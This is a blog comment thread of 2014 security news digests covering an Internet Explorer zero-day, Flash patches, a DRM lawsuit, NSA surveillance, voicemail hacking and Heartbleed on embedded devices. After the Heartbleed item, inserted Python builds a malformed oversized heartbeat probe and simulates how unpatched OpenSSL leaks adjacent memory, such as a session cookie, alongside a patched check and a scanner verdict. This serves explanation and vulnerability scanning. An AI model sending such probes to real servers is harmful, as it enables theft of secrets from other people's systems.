    Criminals might use these methods. That’s a given. But what about anyone worried about their phone being stolen, especially considering the wealth of information stored on it? Does the government plan to take a stance against law enforcement’s push for cell phone “kill switches?”

    Reply
  32. Tomi Engdahl says:

    Now it has happened: attackers found an unfixed security hole in Windows XP

    Microsoft said on Saturday that it has received information about criminals exploiting a hole related to the Windows XP operating system, which is the first security problem found in the operating system after the end of support.

    The security hole is in the Internet Explorer browser, in all versions from 6 to 11.

    This security vulnerability is not corrected in Windows XP, whose support ended in early April.

    Windows XP users can improve operating system security by installing the Enhanced Mitigation Experience Toolkit (EMET) 4.1 security package, which can be downloaded from Microsoft’s website at
    http://www.microsoft.com/en-us/download/details.aspx?id=41138

    Security can also be improved with third-party security applications and by using a different web browser, such as Google Chrome or Mozilla Firefox.

    Source:
    http://www.tietoviikko.fi/kaikki_uutiset/nyt+se+tapahtui+hyokkaajat+loysivat+windows+xphen+liittyvan+paikkaamattoman+aukon/a984364

    Reply
  33. Tomi Engdahl says:

    SunnComm to sue ‘Shift key’ student for $10m
    Alleges DMCA violation, damage to its reputation
    http://www.theregister.co.uk/2003/10/09/sunncomm_to_sue_shift_key/

    SunnComm has threatened Princeton PhD student Alex Halderman with the Digital Millennium Copyright Act (DMCA) for exposing a key weakness in the company’s latest CD copy protection technology, MediaMax CD3.

    The company said today it will take legal action against Halderman for revealing how MediaMax CD3 can be bypassed by holding down a Windows PC’s Shift key when a protected disc is inserted.

    Doing so temporarily disables Windows’ Autorun facility – which many Reg readers have turned off anyway, they tell us – which prevents a small installation app from being launched off the CD.

    Bypassing Autorun allows full access to the CD’s songs.

    SunnComm today said the paper was “erroneous” and contains “false conclusions”.

    SunnComm claims Halderman broke the law by revealing the name of the driver the app installs.

    Bypassing Autorun by holding down the Shift key is a documented feature, after all.

    “I hardly think that telling people to push shift constitutes trafficking in a (copy-protection technology) circumvention device,”

    Reply
  34. Tomi Engdahl says:

    US judge: our digital search warrants apply ANYWHERE
    Azure looking less lovely as Microsoft ordered to hand over e-mails held in Dublin
    http://www.theregister.co.uk/2014/04/28/us_judge_digital_search_warrants_apply_everywhere/

    Microsoft has been told by a US District Court that it must hand over e-mail details to an unnamed law enforcement agency, even though that data is held offshore.

    District Court of Southern New York, Judge James Francis has ruled that the tech giant “cannot refuse to turn over customer information and emails stored in other countries when issued a valid search warrant from U.S. law enforcement agencies,” according to Reuters.

    The ruling will be a blow to Microsoft’s attempts to assure non-US customers that their cloud data is safe from American spooks’ demands for access.

    Microsoft has responded by saying that customer data outside America shouldn’t be subject to search and seizure by US authorities, and is seeking a review of the decision.

    Reply
  35. Tomi Engdahl says:

    Mathematicians Push Back Against the NSA
    http://science.slashdot.org/story/14/04/27/1747230/mathematicians-push-back-against-the-nsa

    “The NSA and GCHQ need mathematicians in order to function — they are some of the biggest employers of mathematicians in the world. This New Scientist article by a mathematician describes some of the math behind mass surveillance, and calls on other mathematicians to refuse to cooperate with the NSA/GCHQ while they continue to surveil the entire population.”

    Reply
  36. Tomi Engdahl says:

    Maths spying: The quandary of working for the spooks
    http://www.newscientist.com/article/mg22229660.200-maths-spying-the-quandary-of-working-for-the-spooks.html?full=true#.U15an1dM0ik

    Intelligence agencies hire lots of mathematicians, but would-be employees must realise that their work is misused to snoop on everyone, says Tom Leinster

    The standard justification for this mass surveillance is to avert terrorism. US officials repeatedly claimed that mass surveillance had thwarted 54 attacks. But the NSA eventually admitted it was more like one or two; its best example was an alleged $8500 donation to a terrorist group.

    Some argue that the information gathered is “only metadata” – phone numbers and call durations rather than what was said, for example. This is not true.

    And so to the mathematicians’ role in all of this. The NSA claims to be the largest employer of mathematicians in the US. It may be the largest in the world. It part funds GCHQ, also a major employer of mathematicians.

    We will never know exactly what mathematicians have done for these agencies.

    Reply
  37. Tomi Engdahl says:

    Bad news: Hackers hit new Internet Explorer bug. More bad news: No patch yet
    Worse news: Windows XP users unlikely to ever see a fix
    http://www.theregister.co.uk/2014/04/27/oops_we_did_it_again_microsoft_warns_of_ie_zero_day/

    Vulnerability CVE-2014-1776, to give the problem its formal name, allows miscreants to hijack at-risk Windows computers.

    Internet Explorer 6 through 11 are all at risk, on all current versions of Windows from Vista to 8 and Windows Server 2003 to 2012 R2. The bug is thought to be present in IE on Windows XP, although that operating system is no longer supported.

    deploy version 4.1 of the Enhanced Mitigation Experience Toolkit

    Microsoft suggests a few other workarounds, such as switching on IE’s Enhanced Protected Mode or setting security levels to “High” to stop ActiveX controls and Active Scripting working.

    Reply
  38. Tomi Engdahl says:

    Reg probe bombshell: How we HACKED mobile voicemail without a PIN
    Months after Leveson inquiry, your messages are still not secure
    http://www.theregister.co.uk/2014/04/24/voicemail_still_easy_to_hack/

    Voicemail inboxes on two UK mobile networks are wide open to being hacked. An investigation by The Register has found that even after Lord Leveson’s press ethics inquiry, which delved into the practice of phone hacking, some telcos are not implementing even the most basic level of security.

    There was a lot of brouhaha over some newspapers accessing people’s voicemail without permission, but one of the strange things about it all is that at no stage have any fingers been pointed at the mobile phone networks for letting snoops in. And some doors are still open.

    If you call your voicemail service from a handset linked to the account, you go through to your message inbox without the need to enter a PIN

    Unfortunately, as our reader found out, this caller identification isn’t at all secure and can be spoofed, so we looked at Three, EE (and Orange), O2 and Vodafone.

    Reply
  39. Tomi Engdahl says:

    Sat comms kit riddled with backdoors for hackers – researcher
    Right, shipmate, identify yourself. LOL? What’s your meaning?
    http://www.theregister.co.uk/2014/04/23/sat_comm_vulns/

    Security researchers claim to have uncovered myriad security problems with satellite communication systems. But while major manufacturer Iridium said the security weaknesses identified by security researchers at IOActive were in hand, Thuraya, another satellite comms service, has criticised the report as inaccurate.

    Multiple high risk vulnerabilities were uncovered in all SATCOM device firmware studied by IOActive.

    If one of these affected devices can be compromised, the entire SATCOM infrastructure could be at risk.

    Ships, aircraft, military personnel, emergency services, media services, and industrial facilities (oilrigs, gas pipelines, water treatment plants, wind turbines, substations, etc.) could all be impacted by these vulnerabilities.

    Reply
  40. Tomi Engdahl says:

    Supreme Court to rule on warrantless searches of electronic devices
    Cops want access, without warrants, to electronic devices of everybody arrested.
    http://arstechnica.com/tech-policy/2014/04/supreme-court-to-rule-on-warrantless-searches-of-electronic-devices/

    The Supreme Court on Tuesday will take on the digital-age controversy over search and seizure of smartphones and other devices.

    President Barack Obama’s administration and prosecutors from states across the country have lobbied for police officers to be able to search arrestees’ gadgets—at or about the time of arrest—without a warrant. Such action, however, demands an examination of the Fourth Amendment’s protection against “unreasonable searches and seizures.”

    Reply
  41. Tomi Engdahl says:

    Drink me: Adobe pours Flash Player bug squash
    Mad dash to slap critical patch on zero day hole
    http://www.theregister.co.uk/2014/04/28/adobe_flash_update/

    Adobe is pushing out a cross-platform security fix for a bug in its Flash Player that miscreants are already exploiting.

    Windows users running Adobe Flash Player 13.0.0.182 and earlier need to update it following the discovery of a zero-day attack.

    “Adobe is aware of reports that an exploit for CVE-2014-0515 exists in the wild, and is being used to target Flash Player users on the Windows platform,” the software maker warned.

    Reply
  42. Tomi Engdahl says:

    Apple patches another major security hole in its website that allowed access to all developer personal information
    http://9to5mac.com/2014/04/28/apple-patches-another-major-security-hole-in-its-website-that-allowed-access-to-all-developer-personal-information/

    Reply
  43. Tomi Engdahl says:

    It’s Crazy What Can Be Hacked Thanks to Heartbleed
    http://www.wired.com/2014/04/heartbleed_embedded/

    Western Digital makes a tiny box where you can store all your photos and other digital stuff. It’s called My Cloud, and you’ve probably seen the TV ads hawking the thing. It gives you a way to access your stuff from any machine, across the internet.

    In the ad, while the rest of humanity is camped out atop one big giant cloud, their digital data exposed to prying eyes and sometimes vanishing altogether, one smiling woman sits on her own personal cloud — confident all her data is completely safe. With My Cloud, Western Digital says, you too can have such confidence.

    But My Cloud has a problem that belies this ad campaign. It’s a big problem, and it involves Heartbleed

    But the My Cloud is just one example of an enormous problem that continues to lurk across the net: tens of thousands of devices — including not only My Cloud storage devices but routers, printers, storage servers, firewalls, video cameras, and more — remain vulnerable to attack.

    In other words, the Internet of Things needs a patch. “It really is disturbing, the number of devices that are affected by this,” Weaver says.

    On Thursday, researchers at the University of Michigan began a massive internet scan to find how widespread the problem really is. The number of devices still at risk is harrowing: HP printers, Polycom video conferencing systems, WatchGuard firewalls, VMWare systems, and Synology storage servers. Weaver counts tens of thousands of users of the Parallels Plesk Panel web hosting control panel that are vulnerable too — those could become a prime target of hackers looking to take control of websites.

    Although many vulnerable devices such as printers are tucked safe behind corporate firewalls, Nicholas Weaver found vulnerable printers accessible over the internet, including some built by HP. But even three weeks after Heartbleed was first disclosed, HP can’t even say which of its printers have the bug.

    But things could have been much worse. Anything that needs to connect securely over the internet could have a Heartbleed problem. But Weaver and the University of Michigan team found that many devices that used OpenSSL were not vulnerable — either because they used an old version of the software library, or because the buggy OpenSSL feature that contains the flaw wasn’t enabled.

    Reply
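The scan described above works by sending each device an oversized heartbeat and seeing whether it answers with more than it was given. As an added example that is not from the Wired article, the University of Michigan scan or OpenSSL itself, this Python model builds the malformed heartbeat record (RFC 6520 layout: type, 16-bit payload_length, payload, padding), runs it through a model of the pre-1.0.1g handler, which trusts payload_length and copies that many bytes from the payload onward into whatever follows the request in memory, and through a model of the 1.0.1g bounds check, which silently drops a message whose claimed length does not fit in the record. A scanner-style verdict function then classifies the two responses. The "adjacent heap" byte string and the "ping" payload are constructed; a device with the heartbeat extension disabled returns nothing, which the verdict function treats the same way as a patched one.

```python
import struct

TLS_HEARTBEAT = 24            # TLS record content type for the Heartbeat protocol (RFC 6520)
HB_REQUEST, HB_RESPONSE = 1, 2
HB_PADDING = 16               # minimum padding bytes a heartbeat message must carry


def tls_record(body, version=(3, 1)):
    """Wrap a heartbeat message in a TLS record header (type, version, length)."""
    return struct.pack("!BBBH", TLS_HEARTBEAT, version[0], version[1], len(body)) + body


def build_heartbeat_request(claimed_len, payload=b""):
    """Build a heartbeat request. `claimed_len` goes into the payload_length
    field; a Heartbleed probe claims far more than the bytes it actually sends."""
    return tls_record(struct.pack("!BH", HB_REQUEST, claimed_len) + payload + b"\x00" * HB_PADDING)


def parse_record(record):
    """Split a TLS record into (content_type, version, body); reject short or inconsistent records."""
    if len(record) < 5:
        raise ValueError("truncated TLS record")
    ctype, vmaj, vmin, length = struct.unpack("!BBBH", record[:5])
    body = record[5:5 + length]
    if len(body) != length:
        raise ValueError("record length field does not match the data")
    return ctype, (vmaj, vmin), body


def unpatched_heartbeat(record, heap_after_record):
    """Model of the pre-1.0.1g handler: it trusts payload_length and copies
    that many bytes starting at the payload, running past the end of the
    request into whatever follows it in process memory. `heap_after_record`
    is a constructed stand-in for that adjacent memory."""
    ctype, version, body = parse_record(record)
    if ctype != TLS_HEARTBEAT or len(body) < 3 or body[0] != HB_REQUEST:
        return None
    payload_len = struct.unpack("!H", body[1:3])[0]
    memory = body[3:] + heap_after_record   # payload, then whatever sits after it
    leaked = memory[:payload_len]           # a real server copies all payload_len bytes;
                                            # the model stops at the end of the constructed heap
    return tls_record(struct.pack("!BH", HB_RESPONSE, payload_len) + leaked + b"\x00" * HB_PADDING, version)


def patched_heartbeat(record, heap_after_record):
    """Model of the 1.0.1g fix: check that type, length field, payload and
    padding all fit inside the record, and silently drop the message otherwise."""
    ctype, version, body = parse_record(record)
    if ctype != TLS_HEARTBEAT or len(body) < 3 or body[0] != HB_REQUEST:
        return None
    if 1 + 2 + HB_PADDING > len(body):
        return None
    payload_len = struct.unpack("!H", body[1:3])[0]
    if 1 + 2 + payload_len + HB_PADDING > len(body):
        return None                         # claimed length exceeds what was received: discard
    payload = body[3:3 + payload_len]
    return tls_record(struct.pack("!BH", HB_RESPONSE, payload_len) + payload + b"\x00" * HB_PADDING, version)


def is_vulnerable(sent_payload, response):
    """Scanner verdict: a heartbeat response carrying more payload than we sent
    means the server read past our request. No response at all (patched build,
    or heartbeat extension disabled) is treated as not vulnerable."""
    if response is None:
        return False
    ctype, _, body = parse_record(response)
    if ctype != TLS_HEARTBEAT or len(body) < 3 or body[0] != HB_RESPONSE:
        return False
    echoed = body[3:]
    return len(echoed) - HB_PADDING > len(sent_payload)


# Constructed process memory: what happened to sit next to the request buffer.
HEAP_AFTER_REQUEST = b"\x00" * 8 + b"Cookie: session=deadbeef; user=admin" + b"\x00" * 64

if __name__ == "__main__":
    probe = build_heartbeat_request(0x4000, b"ping")   # claims 16384 bytes, sends 4
    for name, handler in (("unpatched", unpatched_heartbeat), ("patched", patched_heartbeat)):
        resp = handler(probe, HEAP_AFTER_REQUEST)
        verdict = "VULNERABLE" if is_vulnerable(b"ping", resp) else "not vulnerable"
        print(f"{name}: {verdict}")
        if resp is not None and b"Cookie" in resp:
            print("  leaked:", resp[resp.index(b"Cookie"):].split(b"\x00", 1)[0].decode())
```

The verdict is deliberately based on how much came back rather than on a version banner, which is why the scan could tell the difference between a device that merely ships OpenSSL and one that actually answers the malformed heartbeat.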
  44. Tomi Engdahl says:

    Control Engineering 2014 Cyber Security Study
    http://www.controleng.com/single-article/control-engineering-2014-cyber-security-study/992cf83959f0b11837250236e375da48.html

    Cyber threats to control systems are high, frequencies of vulnerability assessments are low, and many organizations are lacking a capable cyber incident response team. Are your systems at risk?

    Reply
  45. Tomi Engdahl says:

    It’s spade sellers who REALLY make a killing in a gold rush: It’s OVER for graphics card mining
    New Litecoin hardware means alt miners will ditch their packs
    http://www.theregister.co.uk/2014/04/29/litecoin_hardware_spells_the_end_for_graphics_card_mining/

    If you’ve been mining “low-price Bitcoin wannabe” Litecoins with a rig of graphics cards, now is the time to shuffle them off to eBay – unless you can find a better use for them.

    Chinese chip manufacturer Innosilicon is now selling its “A2 Terminator”, a 28nm ASIC for mining Litecoins. It follows on the heels of its A1 offering, a Bitcoin ASIC.

    The A2 is capable of 1.8 mega hashes per second (MH/s) at only 13W power consumption

    Chips and miners are now being sold with chips at $199 each and miners at $12k but this is aimed at resellers who will order at least 20 miners at a time.

    Innosilicon has beaten rival ASIC-pusher KnC Miner to be the first to ship a Litecoin chip

    While people keep Bitcoins, they seem more likely to trade Litecoins – which makes the market even more unstable.

    Reply
  46. Tomi Engdahl says:

    Yelp now lists businesses that accept Bitcoin
    http://www.cnet.com/news/yelp-now-lists-businesses-that-accept-bitcoin/

    Shoppers can check into the reviews site to see whether restaurants, shops, museums, and other establishments accept digital currency payments.

    Reply
  47. Tomi Engdahl says:

    Stop using Microsoft’s IE browser until bug is fixed, US and UK warn
    April 28, 2014
    http://www.cnet.com/news/stop-using-ie-until-bug-is-fixed-says-us/

    In a rare move that highlights the severity of the security hole in one of the Web’s most popular browsers, the US Computer Emergency Readiness Team and its British counterpart tell people to stop using Internet Explorer until Microsoft can fix it.

    It’s not often that the US or UK governments weigh in on the browser wars, but a new Internet Explorer vulnerability that affects all major versions of the browser from the past decade has forced it to raise an alarm: Stop using IE.

    The zero-day exploit, the term given to a previously unknown, unpatched flaw, allows attackers to install malware on your computer without your permission. That malware could be used to steal personal data, track online behavior, or gain control of the computer.

    Reply
  48. Tomi Engdahl says:

    Adobe Update Nixes Flash Player Zero Day
    http://krebsonsecurity.com/2014/04/adobe-update-nixes-flash-player-zero-day/

    Adobe Systems Inc. has shipped an emergency security update to fix a critical flaw in its Flash Player software that is currently being exploited in active attacks. The exploits so far appear to target Microsoft Windows users, but updates also are available for Mac and Linux versions of Flash.

    The Flash update brings the media player to v. 13.0.0.206 on Windows and Mac systems, and v. 11.2.202.356 for Linux users.

    To see which version of Flash you have installed, check this link.
    https://www.adobe.com/software/flash/about/

    Reply
